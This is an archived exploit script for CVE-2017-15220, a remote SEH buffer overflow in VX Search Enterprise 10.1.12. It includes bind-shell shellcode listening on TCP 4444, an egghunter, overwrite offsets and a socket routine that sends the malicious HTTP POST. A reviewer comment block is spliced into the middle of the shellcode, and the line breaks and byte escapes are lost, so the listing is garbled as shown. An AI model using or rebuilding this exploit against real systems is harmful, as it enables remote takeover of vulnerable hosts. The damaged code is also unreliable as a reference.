VX Search Enterprise 10.1.12 Buffer Overflow
Posted on 12 October 2017
#!/usr/bin/env python # Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow # Exploit Author : Revnic Vasile # Email : revnic[at]gmail[dot]com # Date : 09-10-2017 # Vendor Homepage : http://www.flexense.com/ # Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.1.12.exe # Version : 10.1.12 # Tested on : Windows 7 x86 Pro SP1 # Category : Windows Remote Exploit # CVE : CVE-2017-15220 import socket import os import sys import struct # msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUN=none -e x86/alpha_mixed -f c shellcode = ("x89xe5xdbxd3xd9x75xf4x5fx57x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x39x6cx68x68x6fx72x55x50x77x70x53x30x43x50x4d" "x59x79x75x66x51x69x50x45x34x6cx4bx32x70x70x30" "x4cx4bx32x72x64x4cx6ex6bx56x32x66x74x6ex6bx72" "x52x75x78x36x6fx4ex57x33x7ax57x56x54x71x4bx4f" "x4ex4cx65x6cx65x31x73x4cx44x42x56x4cx75x70x5a" "x61x38x4fx36x6dx63x31x4fx37x5ax42x58x72x63x62" "x70x57x6ex6bx42x72x44x50x4cx4bx73x7ax45x6cx6e" "x6bx72x6cx44x51x72x58x78x63x33x78x35x51x48x51" "x42x71x6cx4bx43x69x37x50x77x71x5ax73x4cx4bx67" "x39x77x68x5ax43x66x5ax53x79x4ex6bx74x74x4cx4b" "x43x31x39x46x70x31x6bx4fx6ex4cx39x51x78x4fx46" "x6dx53x31x38x47x55x68x39x70x72x55x7ax56x33x33" "x33x4dx4bx48x35x6bx61x6dx74x64x50x75x4ax44x31" "x48x4cx4bx46x38x56x44x73x31x69x43x50x66x4cx4b" "x46x6cx72x6bx4cx4bx73x68x67x6cx43x31x4bx63x4c" "x4bx46x64x4ex6bx76x61x48x50x4cx49x71x54x34x64" "x35x74x63x6bx71x4bx71x71x36x39x31x4ax46x31x39" "x6fx6dx30x43x6fx73x6fx32x7ax6ex6bx74x52x68x6b" "x6cx4dx43x6dx62x48x44x73x44x72x77x70x65x50x33" "x58x73x47x30x73x56x52x43x6fx31x44x61x78x62x6c" "x53x47x74x66x35x57x59x6fx4ax75x6fx48x4ex70x45" "x51x47x70x57x70x65x79x6fx34x71x44x62x70x43x58" "x46x49x4fx70x30x6bx53x30x59x6fx6ax75x72x4ax33" "x38x53x69x46x30x4bx52x69x6dx73x70x32x70x51x50" "x32x70x31x78x4ax4ax36x6fx49x4fx4bx50x39x6fx49" 
# NOTE(review): archived public proof-of-concept for CVE-2017-15220 (VX Search
# Enterprise 10.1.12, header says tested on Windows 7 x86 SP1). The archive copy
# has lost its line breaks and the escape characters of the byte strings, so the
# listing below is not runnable as shown; treat it as a reference artifact only.
# Defender-relevant facts that are visible in the code: the trigger is a single
# HTTP POST whose request line begins with "/../" and carries a ~5000-byte
# (buf_totlen) path, the overwrite targets the SEH chain (nseh/seh placed at
# dist_seh = 2492), the payload is tagged with the egg string "w00tw00t", and the
# msfvenom comment names a bind shell listening on TCP 4444 on the host. The
# hard-coded 10.10.10.10 in Host/connect is the author's lab target, not a
# real address. Mitigation: the affected build is 10.1.12; move off that
# version and keep the product's built-in web server off untrusted networks.
"x45x4ex77x31x78x75x52x75x50x57x61x53x6cx6bx39" "x7ax46x63x5ax54x50x71x46x32x77x43x58x6bx72x49" "x4bx76x57x53x57x39x6fx38x55x46x37x42x48x38x37" "x48x69x57x48x49x6fx59x6fx58x55x73x67x75x38x44" "x34x68x6cx57x4bx69x71x59x6fx7ax75x51x47x6ex77" "x50x68x50x75x72x4ex52x6dx51x71x6bx4fx4ax75x31" "x78x52x43x70x6dx52x44x67x70x4fx79x78x63x71x47" "x43x67x33x67x75x61x68x76x62x4ax55x42x70x59x56" "x36x7ax42x59x6dx53x56x38x47x32x64x61x34x45x6c" "x76x61x35x51x6cx4dx57x34x34x64x74x50x6bx76x43" "x30x50x44x30x54x52x70x50x56x53x66x53x66x42x66" "x46x36x70x4ex30x56x53x66x72x73x30x56x31x78x33" "x49x38x4cx65x6fx4dx56x4bx4fx59x45x4bx39x79x70" "x32x6ex73x66x33x76x6bx4fx30x30x31x78x65x58x6f" "x77x67x6dx31x70x79x6fx38x55x6dx6bx6ax50x4ex55" "x69x32x30x56x33x58x4cx66x4ex75x4dx6dx4dx6dx59" "x6fx38x55x37x4cx57x76x33x4cx54x4ax6dx50x6bx4b" "x4bx50x32x55x53x35x4dx6bx63x77x57x63x73x42x32" "x4fx52x4ax37x70x51x43x4bx4fx58x55x41x41") buf_totlen = 5000 dist_seh = 2492 nseh = "xebx06AA" seh = 0x1011369e nops = "x90" * 10 egghunter = ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8" "x77x30x30x74" "x8BxFAxAFx75xEAxAFx75xE7xFFxE7") egg = "w00tw00t" payload = "" payload += "A"*(dist_seh - len(payload)) payload += nseh payload += struct.pack("<I", seh) payload += nops payload += egghunter payload += egg payload += shellcode payload += "D"*(buf_totlen - len(payload)) buf = "POST /../%s HTTP/1.1 " %payload buf += "Host: 10.10.10.10 " buf += "User-Agent: Mozilla/5.0 " buf += "Connection: close " buf += " " print "Sending the payload!" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("10.10.10.10", 80)) expl.send(buf) expl.close()